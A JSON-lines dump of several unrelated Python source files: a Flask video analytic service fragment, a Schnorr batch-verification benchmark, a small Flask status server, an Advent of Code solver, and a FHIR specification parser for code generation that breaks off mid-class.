 def add_frame_info(self, include_frame=False):\n self.resp.frame.frame_num = self.input_frame.frame_num\n self.resp.frame.timestamp = self.input_frame.timestamp\n self.resp.frame.frame_byte_size = len(cv2.imencode(\".jpeg\", self.frame, [int(cv2.IMWRITE_JPEG_QUALITY), 100])[1].tobytes())\n if include_frame:\n self.add_frame()\n\n def add_frame(self, quality=70):\n self.resp.frame.frame.height = self.frame.shape[0]\n self.resp.frame.frame.width = self.frame.shape[1]\n self.resp.frame.frame.color = self.frame.shape[2]\n self.resp.frame.frame.img = cv2.imencode(\n \".jpeg\", self.frame, [int(cv2.IMWRITE_JPEG_QUALITY), quality])[1].tobytes()\n self.resp.frame.frame_byte_size = self.resp.frame.frame.ByteSize()\n\n def add_encoded_frame(self, enc_frame):\n self.resp.frame.frame.img = enc_frame\n self.resp.frame.frame_byte_size = self.resp.frame.frame.ByteSize()\n\n def update_analytic_metadata(self, **kwargs):\n name = kwargs.get(\"name\")\n addr = kwargs.get(\"addr\")\n gpu = kwargs.get(\"requires_gpu\")\n operations = kwargs.get(\"operations\")\n filters = kwargs.get(\"filters\")\n replica_addrs = kwargs.get(\"replica_addrs\")\n\n if name:\n self.analytic.name = name\n if gpu:\n self.analytic.requires_gpu = gpu\n if addr:\n self.analytic.addr = addr\n if operations:\n # repeated protobuf fields cannot be assigned directly, only extended\n self.analytic.operations.extend(operations)\n if filters:\n # map protobuf fields are updated in place\n self.analytic.filters.update(filters)\n if replica_addrs:\n # the original bare attribute access here had no effect\n self.analytic.replica_addrs.extend(replica_addrs)\n\n def add_filter(self, f, value):\n logger.info(\"Adding filter: {!s} = {!s}\".format(f, value))\n self.resp.analytic.filters[f] = str(value)\n\n def merge_response(self, resp):\n self.resp.MergeFrom(resp)\n\n def add_frame_if_missing(self, frame):\n if self.resp.frame.ByteSize() > 0:\n return False\n logger.info(\"No frame in response. Adding frame.\")\n # add_frame() takes a JPEG quality, not a frame; store the frame first\n self.frame = frame\n self.add_frame()\n return True\n\n def set_name(self, name):\n self.resp.analytic.name = name\n\n def add_operation(self, operation):\n self.resp.analytic.operations.append(operation)\n\n def set_start_time(self):\n self.resp.data.start_time_millis = int(round(time.time()*1000))\n\n def set_end_time(self):\n self.resp.data.end_time_millis = int(round(time.time()*1000))\n\n def add_tags(self, **kwargs):\n for key, value in kwargs.items():\n self.resp.data.tags[key] = str(value)\n\n\nclass AnalyticService:\n \"\"\" \"\"\"\n\n def __init__(self, name, port=3000, debug=False, stream_video=False, verbose=False, num_workers=1):\n self.app = Flask(name)\n self._add_endpoint(\"/config\", \"config\", self.config, methods=[\"PUT\"])\n self._add_endpoint(\"/kill\", \"kill\", self.kill, methods=[\"POST\"])\n self.analytic = analytic_pb2.AnalyticData()\n self.port = port\n self.handler = None\n self.stream_video = stream_video\n self.num_workers = num_workers\n self.verbose = verbose\n\n def Run(self):\n \"\"\" \"\"\"\n logger.info(\"REST config service running on ::{!s}\".format(self.port))\n self.app.run(host=\"::\", port=self.port)\n\n def config(self):\n \"\"\" \"\"\"\n if self.handler:\n logger.info(\"Shutting down RTSP connection.\")\n self.handler.terminate()\n\n data = request.get_data(as_text=False)\n req = analytic_pb2.StreamRequest().FromString(data)\n logger.debug(\"Request: %s\", req)\n self.analytic.MergeFrom(req.analytic)\n if self.verbose:\n print(\"Creating RTSP handler with verbose option\")\n print(\"Config Request :\", req)\n self.handler = RTSPHandler(req.stream_source,\n self._call_endpoint,\n cap_width=req.frame_width,\n cap_height=req.frame_height,\n analytic_data=req.analytic,\n verbose=self.verbose,\n num_workers=self.num_workers) # TODO Untested.\n self.system_tags = dict(req.system_tags)\n self.stream_addr = req.stream_source\n if req.kafka_addr:\n self.handler.add_producer(producer=KafkaProducer(\n bootstrap_servers=req.kafka_addr, value_serializer=lambda value: 
value.SerializeToString()))\n if req.db_addr:\n host, port = req.db_addr.split(\":\")\n self.handler.add_database(db_client=AceDB(host=host, port=port))\n t = threading.Thread(target=self.handler.run)\n t.start()\n return {\"code\": 200}\n\n def kill(self):\n \"\"\" \"\"\"\n if not self.handler:\n logger.info(\"Nothing running\")\n return {\"code\": 200} # a bare None is not a valid Flask response\n logger.info(\"Shutting down RTSP connection\")\n self.handler.terminate()\n return {\"code\": 200}\n\n def RegisterProcessVideoFrame(self, f):\n \"\"\" \"\"\"\n self.register_func(f, input_type=\"frame\")\n\n def RegisterProcessFrameBatch(self, f):\n \"\"\" \"\"\"\n raise NotImplementedError\n\n def register_name(self, name):\n \"\"\" \"\"\"\n self.analytic.name = name\n\n def register_func(self, f, input_type=\"frame\"):\n \"\"\" \"\"\"\n self.func = f\n self.func_type = input_type\n\n def _add_endpoint(self, endpoint=None, endpoint_name=None, handler=None, methods=None):\n self.app.add_url_rule(endpoint, endpoint_name,\n EndpointAction(handler), methods=methods)\n\n def _call_endpoint(self, frame_obj):\n handler = AnalyticHandler(\n frame_obj, input_type=self.func_type, stream_addr=self.stream_addr)\n handler.update_analytic_metadata(\n name=self.analytic.name, addr=self.analytic.addr)\n handler.set_start_time()\n self.func(handler)\n handler.set_end_time()\n for key, value in self.system_tags.items():\n handler.resp.data.tags.update({key: value})\n\n return handler.get_response()\n","sub_path":"lang/python/ace/analyticservice.py","file_name":"analyticservice.py","file_ext":"py","file_size_in_byte":9069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"21754647","text":"#!/usr/bin/env python3\n\n# Copyright (C) 2017-2019 The btclib developers\n#\n# This file is part of btclib. 
It is subject to the license terms in the\n# LICENSE file found in the top-level directory of this distribution.\n#\n# No part of btclib including this file, may be copied, modified, propagated,\n# or distributed except according to the terms contained in the LICENSE file.\n\nimport random\nimport time\nfrom hashlib import sha256\n\nfrom btclib.curve import mult\nfrom btclib.curves import secp256k1\nfrom btclib.ssa import sign, verify, batch_verify\n\nrandom.seed(42)\n\nec = secp256k1\nhf = sha256\nhsize = hf().digest_size\nhlen = hsize * 8\n\n# n = 1 loops forever and does not really test batch verify\nn_sig = [2, 4, 8, 16, 32, 64, 128]\nm = []\nsig = []\nQ = []\nfor j in range(max(n_sig)):\n m.append(random.getrandbits(hlen).to_bytes(hsize, 'big'))\n q = random.getrandbits(ec.nlen) % ec.n\n sig.append(sign(ec, hf, m[j], q))\n Q.append(mult(ec, q, ec.G))\n\nfor n in n_sig:\n\n # no batch\n start = time.time()\n for j in range(n):\n assert verify(ec, hf, m[j], Q[j], sig[j])\n elapsed1 = time.time() - start\n\n # batch\n start = time.time()\n assert batch_verify(ec, hf, m[:n], Q[:n], sig[:n])\n elapsed2 = time.time() - start\n\n print(n, elapsed2 / elapsed1)\n","sub_path":"py-scripts/speedup_batchval.py","file_name":"speedup_batchval.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"321345279","text":"from flask import Flask\nfrom datetime import datetime\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef hello():\n return \"Hello, World!\"\n\n@app.route(\"/status\")\ndef status():\n current_time = datetime.now().strftime('%Y/%m/%d %H:%M') # %M = minutes (was %m, the month)\n return {\n 'status': True,\n 'name': 'SkillMessenger',\n 'time': current_time}\n\napp.run()","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"319699727","text":"PREAMBLE_LENGTH = 25\n\n\nclass MaskingInput:\n\n def __init__(self, data):\n self.data = data\n\n\n def get_first_invalid(self):\n for i in range(PREAMBLE_LENGTH, len(self.data)):\n if not self.is_valid_index(i):\n return self.data[i]\n return None\n\n def is_valid_index(self, i):\n preamble = self.data[i-PREAMBLE_LENGTH:i]\n datum = self.data[i]\n return self.can_sum(preamble, datum)\n\n def get_sum_set(self, goal):\n for i in range(len(self.data)):\n for j in range(i+2, len(self.data)):\n subset = self.data[i:j]\n total = sum(subset)\n if total == goal:\n return subset\n elif total > goal:\n break\n return None\n\n\n @staticmethod\n def can_sum(preamble, datum):\n for value in preamble:\n needed = datum - value\n if needed in preamble:\n return True\n return False\n\n\ndef main():\n masking = MaskingInput(process())\n\n invalid_number = masking.get_first_invalid()\n # Part 1: 104054607\n print('Part 1: {}'.format(invalid_number))\n\n sum_set = masking.get_sum_set(invalid_number)\n magic_number = min(sum_set) + max(sum_set)\n # Part 2: 13935797\n print('Part 2: {}'.format(magic_number))\n\n\ndef process():\n data = []\n f = open('data.txt', 'r')\n\n for line in f:\n line = line.strip()\n data.append(int(line))\n\n f.close()\n return data\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"2020/09/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"351095677","text":"#!/usr/bin/env python\n# -*- coding: utf-8 
-*-\n\nimport io\nimport os\nimport re\nimport json\nimport datetime\nfrom pathlib import Path\nimport stringcase # type: ignore\nfrom typing import Any, Dict, List, Optional, Union, TYPE_CHECKING\n\nfrom .logger import logger\nfrom . import fhirclass\n\nif TYPE_CHECKING:\n from .generators.yaml_model import GeneratorConfig\n\n# TODO: check\n# allow to skip some profiles by matching against their url (used while WiP)\nskip_because_unsupported = [\n r\"SimpleQuantity\",\n]\n\n\nclass FHIRSpec(object):\n \"\"\" The FHIR specification.\n \"\"\"\n\n def __init__(self, directory: Path, generator_config: \"GeneratorConfig\"):\n assert directory.is_dir()\n self.directory = directory\n self.generator_config = generator_config\n self.info = FHIRVersionInfo(self, directory)\n\n # system-url: FHIRValueSet()\n self.valuesets: Dict[str, \"FHIRValueSet\"] = {}\n\n # system-url: FHIRCodeSystem()\n self.codesystems: Dict[str, \"FHIRCodeSystem\"] = {}\n\n # profile-name: FHIRStructureDefinition()\n self.profiles: Dict[str, \"FHIRStructureDefinition\"] = {}\n\n # Load profiles\n self.prepare()\n self.read_profiles()\n self.finalize()\n\n def prepare(self):\n \"\"\" Run actions before starting to parse profiles.\n \"\"\"\n self.read_valuesets()\n self.handle_manual_profiles()\n\n def read_bundle_resources(self, filename: str):\n \"\"\" Return an array of the Bundle's entry's \"resource\" elements.\n \"\"\"\n logger.info(\"Reading {}\".format(filename))\n filepath = os.path.join(self.directory, filename)\n with io.open(filepath, encoding=\"utf-8\") as handle:\n parsed = json.load(handle)\n if \"resourceType\" not in parsed:\n raise Exception(\n 'Expecting \"resourceType\" to be present, but is not in {}'.format(\n filepath\n )\n )\n if \"Bundle\" != parsed[\"resourceType\"]:\n raise Exception('Can only process \"Bundle\" resources')\n if \"entry\" not in parsed:\n raise Exception(\n \"There are no entries in the Bundle at {}\".format(filepath)\n )\n\n return [e[\"resource\"] for e in parsed[\"entry\"]]\n\n # MARK: Managing ValueSets and CodeSystems\n\n def read_valuesets(self):\n resources = self.read_bundle_resources(\"valuesets.json\")\n for resource in resources:\n if \"ValueSet\" == resource[\"resourceType\"]:\n assert \"url\" in resource\n valueset = FHIRValueSet(self, resource)\n self.valuesets[valueset.url] = valueset\n if valueset.dstu2_inlined_codesystem:\n codesystem = FHIRCodeSystem(self, valueset.dstu2_inlined_codesystem)\n codesystem.valueset_url = valueset.url\n self.found_codesystem(codesystem)\n elif \"CodeSystem\" == resource[\"resourceType\"]:\n assert \"url\" in resource\n if \"content\" in resource and \"concept\" in resource:\n codesystem = FHIRCodeSystem(self, resource)\n self.found_codesystem(codesystem)\n else:\n logger.warning(f\"CodeSystem with no concepts: {resource['url']}\")\n logger.info(\n f\"Found {len(self.valuesets)} ValueSets and {len(self.codesystems)} CodeSystems\"\n )\n\n def found_codesystem(self, codesystem):\n if codesystem.url not in self.generator_config.mapping_rules.enum_ignore:\n self.codesystems[codesystem.url] = codesystem\n\n def valueset_with_uri(self, uri) -> Optional[\"FHIRValueSet\"]:\n assert uri\n if uri not in self.valuesets:\n logger.warning(f\"Valueset not found for URI : {uri}\")\n return None\n return self.valuesets[uri]\n\n def codesystem_with_uri(self, uri) -> Optional[\"FHIRCodeSystem\"]:\n assert uri\n if uri not in self.codesystems:\n logger.warning(f\"Codesystem not found for URI : {uri}\")\n return None\n return self.codesystems[uri]\n\n # 
MARK: Handling Profiles\n\n def read_profiles(self):\n \"\"\" Find all (JSON) profiles and instantiate into FHIRStructureDefinition.\n \"\"\"\n resources = []\n for filename in [\n \"profiles-types.json\",\n \"profiles-resources.json\",\n ]: # , 'profiles-others.json']:\n bundle_res = self.read_bundle_resources(filename)\n for resource in bundle_res:\n if \"StructureDefinition\" == resource[\"resourceType\"]:\n resources.append(resource)\n else:\n logger.debug(\n \"Not handling resource of type {}\".format(\n resource[\"resourceType\"]\n )\n )\n\n # create profile instances\n for resource in resources:\n profile = FHIRStructureDefinition(self, resource)\n for pattern in skip_because_unsupported:\n if re.search(pattern, profile.url) is not None:\n logger.info('Skipping \"{}\"'.format(resource[\"url\"]))\n profile = None\n break\n\n if profile is not None and self.found_profile(profile):\n profile.process_profile()\n\n def found_profile(self, profile):\n if not profile or not profile.name:\n raise Exception(\"No name for profile {}\".format(profile))\n if profile.name.lower() in self.profiles:\n logger.debug('Already have profile \"{}\", discarding'.format(profile.name))\n return False\n\n self.profiles[profile.name.lower()] = profile\n return True\n\n def handle_manual_profiles(self):\n \"\"\" Creates in-memory representations for all our manually defined\n profiles.\n \"\"\"\n for manual_profile in self.generator_config.manual_profiles:\n for contained in manual_profile.contains:\n profile = FHIRStructureDefinition(self, None)\n profile.manual_module = manual_profile.module\n\n prof_dict = {\n \"name\": contained,\n \"differential\": {\"element\": [{\"path\": contained}]},\n }\n\n profile.structure = FHIRStructureDefinitionStructure(profile, prof_dict)\n if self.found_profile(profile):\n profile.process_profile()\n\n def finalize(self):\n \"\"\" Should be called after all profiles have been parsed and allows\n to perform additional actions, like looking up class implementations\n from different profiles.\n \"\"\"\n for _, prof in self.profiles.items():\n prof.finalize()\n\n # MARK: Naming Utilities\n\n def as_module_name(self, name: str) -> str:\n if self.generator_config.naming_rules.resource_modules_lowercase:\n return name.lower()\n else:\n return name\n\n def as_class_name(\n self, classname: Optional[str], parent_name: Optional[str] = None\n ) -> Optional[str]:\n \"\"\" This method formulates a class name from the given arguments,\n applying formatting according to config.\n \"\"\"\n if classname is None or len(classname) == 0:\n return None\n\n classmap = self.generator_config.mapping_rules.classmap\n\n if parent_name is not None:\n # if we have a parent, do we have a mapped class?\n pathname = f\"{parent_name}.{classname}\"\n if pathname in classmap:\n return classmap[pathname]\n\n # is our plain class mapped?\n if classname in classmap:\n return classmap[classname]\n\n # CamelCase or just plain\n if self.generator_config.naming_rules.camelcase_classes:\n return stringcase.pascalcase(classname) # upper camelcase\n return classname\n\n def class_name_for_type(\n self, type_name: str, parent_name: Optional[str] = None\n ) -> Optional[str]:\n return self.as_class_name(type_name, parent_name)\n\n def class_name_for_type_if_property(self, type_name: str) -> Optional[str]:\n classname = self.class_name_for_type(type_name)\n if not classname:\n return None\n return self.generator_config.mapping_rules.replacemap.get(classname, classname)\n\n def class_name_for_profile(\n self, profile_name: 
Optional[Union[List[str], str]]\n ) -> Optional[Union[List[Optional[str]], str]]:\n if not profile_name:\n return None\n # TODO need to figure out what to do with this later. Annotation author supports multiples types that caused this to fail\n if isinstance(profile_name, (list,)):\n classnames = []\n for name_part in profile_name:\n classnames.append(\n self.as_class_name(name_part.split(\"/\")[-1])\n ) # may be the full Profile URI, like http://hl7.org/fhir/Profile/MyProfile\n return classnames\n type_name = profile_name.split(\"/\")[\n -1\n ] # may be the full Profile URI, like http://hl7.org/fhir/Profile/MyProfile\n return self.as_class_name(type_name)\n\n def class_name_is_native(self, class_name: str) -> bool:\n return class_name in self.generator_config.mapping_rules.natives\n\n def safe_property_name(self, prop_name: str) -> str:\n return self.generator_config.mapping_rules.reservedmap.get(prop_name, prop_name)\n\n def safe_enum_name(self, enum_name: str, ucfirst: bool = False) -> str:\n assert enum_name, \"Must have a name\"\n\n name = self.generator_config.mapping_rules.enum_map.get(enum_name, enum_name)\n parts = re.split(r\"[\\W_]+\", name)\n\n # /!\\ \"CamelCase\" term here is misleading.\n # \"CamelCase\" is not opposed to \"snake_case\", at least here.\n # See tests to see real cases.\n if self.generator_config.naming_rules.camelcase_enums:\n name = \"\".join([n[:1].upper() + n[1:] for n in parts])\n if not ucfirst and name.upper() != name:\n name = name[:1].lower() + name[1:]\n else:\n # /!\\ This is not a real snakecase.\n # Is it a problem ? Ex: HTTPVerb remains HTTPVerb\n name = \"_\".join(parts)\n\n if re.match(r\"^\\d\", name):\n name = f\"_{name}\"\n\n return self.generator_config.mapping_rules.reservedmap.get(name, name)\n\n def json_class_for_class_name(self, class_name: str) -> str:\n return self.generator_config.mapping_rules.jsonmap.get(\n class_name, self.generator_config.mapping_rules.jsonmap_default\n )\n\n # MARK: Writing Data\n\n def writable_profiles(self):\n \"\"\" Returns a list of `FHIRStructureDefinition` instances.\n \"\"\"\n return [\n profile\n for profile in self.profiles.values()\n if profile.manual_module is None\n ]\n\n\nclass FHIRVersionInfo(object):\n \"\"\" The version of a FHIR specification.\n \"\"\"\n\n def __init__(self, spec, directory):\n self.spec = spec\n\n now = datetime.date.today()\n self.date = now.isoformat()\n self.year = now.year\n\n infofile = os.path.join(directory, \"version.info\")\n self.version = self.read_version(infofile)\n\n def read_version(self, filepath):\n assert os.path.isfile(filepath)\n with io.open(filepath, \"r\", encoding=\"utf-8\") as handle:\n for line in handle.readlines():\n if line.startswith(\"FhirVersion\"):\n return line.split(\"=\", 2)[1].strip()\n\n\nclass FHIRValueSetEnum(object):\n \"\"\" Holds on to parsed `FHIRValueSet` properties.\n \"\"\"\n\n def __init__(\n self,\n name: str,\n restricted_to: List[str],\n value_set: \"FHIRValueSet\",\n is_codesystem_known: bool,\n ):\n self.name = name\n self.restricted_to = restricted_to if len(restricted_to) > 0 else None\n self.value_set = value_set\n self.is_codesystem_known = is_codesystem_known\n self.represents_class = True # required for FHIRClass compatibility\n self.module = name # required for FHIRClass compatibility\n self.name_if_class = name # required for FHIRClass compatibility\n self.superclass_name = None # required for FHIRClass compatibility\n self.path = None # required for FHIRClass compatibility\n\n @property\n def definition(self) -> 
\"FHIRValueSet\":\n return self.value_set\n\n def name_of_resource(self) -> None: # required for FHIRClass compatibility\n return None\n\n\nclass FHIRValueSet(object):\n \"\"\" Holds on to ValueSets bundled with the spec.\n \"\"\"\n\n def __init__(self, spec: \"FHIRSpec\", set_dict: Dict[str, Any]):\n self.spec = spec\n self.definition = set_dict\n self.url = set_dict.get(\"url\")\n self.dstu2_inlined_codesystem = self.definition.get(\"codeSystem\")\n if self.dstu2_inlined_codesystem is not None:\n self.dstu2_inlined_codesystem[\"url\"] = self.dstu2_inlined_codesystem[\n \"system\"\n ]\n self.dstu2_inlined_codesystem[\"content\"] = \"complete\"\n self.dstu2_inlined_codesystem[\"name\"] = self.definition.get(\"name\")\n self.dstu2_inlined_codesystem[\"description\"] = self.definition.get(\n \"description\"\n )\n\n self._enum: Optional[\"FHIRValueSetEnum\"] = None\n\n @property\n def short(self):\n return self.definition.get(\"title\")\n\n @property\n def formal(self):\n return self.definition.get(\"description\")\n\n @property\n def enum(self) -> Optional[FHIRValueSetEnum]:\n \"\"\" Returns FHIRValueSetEnum if this valueset can be represented by one.\n \"\"\"\n if self._enum is not None:\n return self._enum\n\n include = self.__safely_get_single_include()\n if include is None:\n return None\n\n system = include.get(\"system\")\n if system is None:\n return None\n\n # alright, this is a ValueSet with 1 include and a system, is there a CodeSystem?\n cs = self.spec.codesystem_with_uri(system)\n is_codesystem_known = True\n if cs is None or not cs.generate_enum:\n # If no CodeSystem is found, we build an unofficial enum\n # Example : system = \"http://unitsofmeasure.org\" is not defined in FHIR\n is_codesystem_known = False\n cs_name = \"unknown_codesystem_enum\"\n else:\n cs_name = cs.name\n\n # Restrict CodeSystem to subset of concepts\n restricted_to = []\n for concept in include.get(\"concept\", []):\n assert \"code\" in concept\n restricted_to.append(concept[\"code\"])\n\n self._enum = FHIRValueSetEnum(\n name=cs_name,\n restricted_to=restricted_to,\n value_set=self,\n is_codesystem_known=is_codesystem_known,\n )\n return self._enum\n\n def __safely_get_single_include(self) -> Optional[Dict[str, Any]]:\n include = None\n\n if self.dstu2_inlined_codesystem is not None:\n include = [self.dstu2_inlined_codesystem]\n else:\n compose = self.definition.get(\"compose\")\n if compose is None:\n msg = f\"Currently only composed ValueSets are supported. {self.definition}\"\n raise Exception(msg)\n if \"exclude\" in compose:\n msg = \"Not currently supporting 'exclude' on ValueSet\"\n raise Exception(msg)\n\n # \"import\" is for DSTU-2 compatibility\n include = compose.get(\"include\") or compose.get(\"import\") or []\n\n if len(include) != 1:\n logger.warning(\n f\"Ignoring ValueSet with more than 1 includes ({len(include)}: {include})\"\n )\n return None\n\n return include[0]\n\n\nclass FHIRCodeSystem(object):\n \"\"\" Holds on to CodeSystems bundled with the spec.\n \"\"\"\n\n def __init__(self, spec: FHIRSpec, resource):\n assert \"content\" in resource\n self.spec = spec\n self.definition = resource\n self.url = resource.get(\"url\")\n if self.url in self.spec.generator_config.mapping_rules.enum_namemap:\n self.name = self.spec.generator_config.mapping_rules.enum_namemap[self.url]\n else:\n self.name = self.spec.safe_enum_name(resource.get(\"name\"), ucfirst=True)\n if len(self.name) < 1:\n raise Exception(\n f\"Unable to create a name for enum of system {self.url}. 
You may need to specify a name explicitly in mappings.enum_namemap. Code system content: {resource}\"\n )\n self.description = resource.get(\"description\")\n self.valueset_url = resource.get(\"valueSet\")\n self.codes = None\n self.generate_enum = False\n concepts = resource.get(\"concept\", [])\n\n if resource.get(\"experimental\"):\n return\n\n if resource[\"content\"] == \"complete\":\n self.generate_enum = True\n\n if not self.generate_enum:\n logger.warning(\n f\"Will not generate enum for CodeSystem '{self.url}' whose content is {resource['content']}\"\n )\n return\n\n assert concepts, 'Expecting at least one code for \"complete\" CodeSystem'\n if len(concepts) > 200:\n self.generate_enum = False\n logger.info(\n f\"Will not generate enum for CodeSystem '{self.url}' because it has > 200 ({len(concepts)}) concepts\"\n )\n return\n\n self.codes = self.parsed_codes(concepts)\n\n def parsed_codes(self, codes, prefix=None):\n found = []\n for c in codes:\n if c[\"code\"][:1].isdigit():\n self.generate_enum = False\n logger.info(\n f\"Will not generate enum for CodeSystem '{self.url}' because at least one concept code starts with a number\"\n )\n return None\n\n cd = c[\"code\"]\n # name = (\n # \"{}-{}\".format(prefix, cd)\n # if prefix and not cd.startswith(prefix)\n # else cd\n # )\n code_name = self.spec.safe_enum_name(cd)\n if len(code_name) < 1:\n raise Exception(\n f\"Unable to create a member name for enum '{cd}' in {self.url}. You may need to add '{cd}' to mappings.enum_map\"\n )\n c[\"name\"] = code_name\n c[\"definition\"] = c.get(\"definition\") or c[\"name\"]\n found.append(c)\n\n # nested concepts?\n if \"concept\" in c:\n fnd = self.parsed_codes(c[\"concept\"])\n if fnd is None:\n return None\n found.extend(fnd)\n return found\n\n\nclass FHIRStructureDefinition(object):\n \"\"\" One FHIR structure definition.\n \"\"\"\n\n def __init__(self, spec, profile):\n self.manual_module = None\n self.spec = spec\n self.url = None\n self.targetname = None\n self.structure = None\n self.elements = None\n self.main_element = None\n self._class_map = {}\n self.classes: List[fhirclass.FHIRClass] = []\n self._did_finalize = False\n\n if profile is not None:\n self.parse_profile(profile)\n\n def __repr__(self):\n return f\"<{self.__class__.__name__}> name: {self.name}, url: {self.url}\"\n\n @property\n def name(self):\n return self.structure.name if self.structure is not None else None\n\n def read_profile(self, filepath):\n \"\"\" Read the JSON definition of a profile from disk and parse.\n\n Not currently used.\n \"\"\"\n profile = None\n with io.open(filepath, \"r\", encoding=\"utf-8\") as handle:\n profile = json.load(handle)\n self.parse_profile(profile)\n\n def parse_profile(self, profile):\n \"\"\" Parse a JSON profile into a structure.\n \"\"\"\n assert profile\n assert \"StructureDefinition\" == profile[\"resourceType\"]\n\n # parse structure\n self.url = profile.get(\"url\")\n logger.info('Parsing profile \"{}\"'.format(profile.get(\"name\")))\n self.structure = FHIRStructureDefinitionStructure(self, profile)\n\n def process_profile(self):\n \"\"\" Extract all elements and create classes.\n \"\"\"\n struct = self.structure.differential # or self.structure.snapshot\n if struct is not None:\n mapped = {}\n self.elements = []\n for elem_dict in struct:\n element = FHIRStructureDefinitionElement(\n self, elem_dict, self.main_element is None\n )\n self.elements.append(element)\n mapped[element.path] = element\n\n # establish hierarchy (may move to extra loop in case elements are no 
longer in order)\n if element.is_main_profile_element:\n self.main_element = element\n parent = mapped.get(element.parent_name)\n if parent:\n parent.add_child(element)\n\n # resolve element dependencies\n for element in self.elements:\n element.resolve_dependencies()\n\n # run check: if n_min > 0 and parent is in summary, must also be in summary\n for element in self.elements:\n if element.n_min is not None and element.n_min > 0:\n if (\n element.parent is not None\n and element.parent.is_summary\n and not element.is_summary\n ):\n logger.error(\n \"n_min > 0 but not summary: `{}`\".format(element.path)\n )\n element.summary_n_min_conflict = True\n\n # create classes and class properties\n if self.main_element is not None:\n snap_class, subs = self.main_element.create_class()\n if snap_class is None:\n raise Exception(\n 'The main element for \"{}\" did not create a class'.format(self.url)\n )\n\n self.found_class(snap_class)\n for sub in subs:\n self.found_class(sub)\n self.targetname = snap_class.name\n\n def element_with_id(self, ident):\n \"\"\" Returns a FHIRStructureDefinitionElementDefinition with the given\n id, if found. Used to retrieve elements defined via `contentReference`.\n \"\"\"\n if self.elements is not None:\n for element in self.elements:\n if element.definition.id == ident:\n return element\n return None\n\n def dstu2_element_with_name(self, name):\n \"\"\" Returns a FHIRStructureDefinitionElementDefinition with the given\n name, if found. Used to retrieve elements defined via `nameReference`\n used in DSTU-2.\n \"\"\"\n if self.elements is not None:\n for element in self.elements:\n if element.definition.name == name:\n return element\n return None\n\n # MARK: Class Handling\n\n def found_class(self, klass):\n self.classes.append(klass)\n\n def needed_external_classes(self):\n \"\"\" Returns a unique list of class items that are needed for any of the\n receiver's classes' properties and are not defined in this profile.\n\n :raises: Will raise if called before `finalize` has been called.\n \"\"\"\n if not self._did_finalize:\n raise Exception(\"Cannot use `needed_external_classes` before finalizing\")\n\n internal = set([c.name for c in self.classes])\n needed = set()\n needs = []\n\n for klass in self.classes:\n # are there superclasses that we need to import?\n sup_cls = klass.superclass\n if (\n sup_cls is not None\n and sup_cls.name not in internal\n and sup_cls.name not in needed\n ):\n needed.add(sup_cls.name)\n needs.append(sup_cls)\n\n # look at all properties' classes and assign their modules\n for prop in klass.properties:\n prop_cls_name = prop.class_name\n if prop.enum is not None:\n enum_cls, did_create = fhirclass.FHIRClass.for_element(prop.enum)\n enum_cls.module = prop.enum.name\n prop.module_name = enum_cls.module\n if enum_cls.name not in needed:\n needed.add(enum_cls.name)\n needs.append(enum_cls)\n\n elif (\n prop_cls_name not in internal\n and not self.spec.class_name_is_native(prop_cls_name)\n ):\n prop_cls = fhirclass.FHIRClass.with_name(prop_cls_name)\n if prop_cls is None:\n raise Exception(\n 'There is no class \"{}\" for property \"{}\" on \"{}\" in {}'.format(\n prop_cls_name, prop.name, klass.name, self.name\n )\n )\n else:\n prop.module_name = prop_cls.module\n if prop_cls_name not in needed:\n needed.add(prop_cls_name)\n needs.append(prop_cls)\n\n return sorted(needs, key=lambda n: n.module or n.name)\n\n def referenced_classes(self):\n \"\"\" Returns a unique list of **external** class names that are\n referenced from at least one of 
the receiver's `Reference`-type\n properties.\n\n :raises: Will raise if called before `finalize` has been called.\n \"\"\"\n if not self._did_finalize:\n raise Exception(\"Cannot use `referenced_classes` before finalizing\")\n\n references = set()\n for klass in self.classes:\n for prop in klass.properties:\n if len(prop.reference_to_names) > 0:\n references.update(prop.reference_to_names)\n\n # no need to list references to our own classes, remove them\n for klass in self.classes:\n references.discard(klass.name)\n\n return sorted(references)\n\n def writable_classes(self):\n return [klass for klass in self.classes if klass.should_write()]\n\n # MARK: Finalizing\n\n def finalize(self):\n \"\"\" Our spec object calls this when all profiles have been parsed.\n \"\"\"\n\n # assign all super-classes as objects\n for cls in self.classes:\n if cls.superclass is None:\n super_cls = fhirclass.FHIRClass.with_name(cls.superclass_name)\n if super_cls is None and cls.superclass_name is not None:\n raise Exception(\n 'There is no class implementation for class named \"{}\" in profile \"{}\"'.format(\n cls.superclass_name, self.url\n )\n )\n else:\n cls.superclass = super_cls\n\n self._did_finalize = True\n\n\nclass FHIRStructureDefinitionStructure(object):\n \"\"\" The actual structure of a complete profile.\n \"\"\"\n\n def __init__(self, profile, profile_dict):\n self.profile = profile\n self.name = None\n self.base = None\n self.kind = None\n self.subclass_of = None\n self.snapshot = None\n self.differential = None\n\n self.parse_from(profile_dict)\n\n def parse_from(self, json_dict):\n name = json_dict.get(\"name\")\n if not name:\n raise Exception(\"Must find 'name' in profile dictionary but found nothing\")\n self.name = self.profile.spec.class_name_for_profile(name)\n self.base = json_dict.get(\"baseDefinition\")\n self.kind = json_dict.get(\"kind\")\n if self.base:\n self.subclass_of = self.profile.spec.class_name_for_profile(self.base)\n\n # find element definitions\n if \"snapshot\" in json_dict:\n self.snapshot = json_dict[\"snapshot\"].get(\"element\", [])\n if \"differential\" in json_dict:\n self.differential = json_dict[\"differential\"].get(\"element\", [])\n\n\nclass FHIRStructureDefinitionElement(object):\n \"\"\" An element in a profile's structure.\n \"\"\"\n\n def __init__(self, profile, element_dict, is_main_profile_element=False):\n assert isinstance(profile, FHIRStructureDefinition)\n self.profile = profile\n self.path = None\n self.parent = None\n self.children = None\n self.parent_name = None\n self.definition = None\n self.n_min = None\n self.n_max = None\n self.is_summary = False\n # to mark conflicts, see #13215 (http://gforge.hl7.org/gf/project/fhir/tracker/?action=TrackerItemEdit&tracker_item_id=13125)\n self.summary_n_min_conflict = False\n self.valueset = None\n self.enum = None # assigned if the element has a binding to a ValueSet 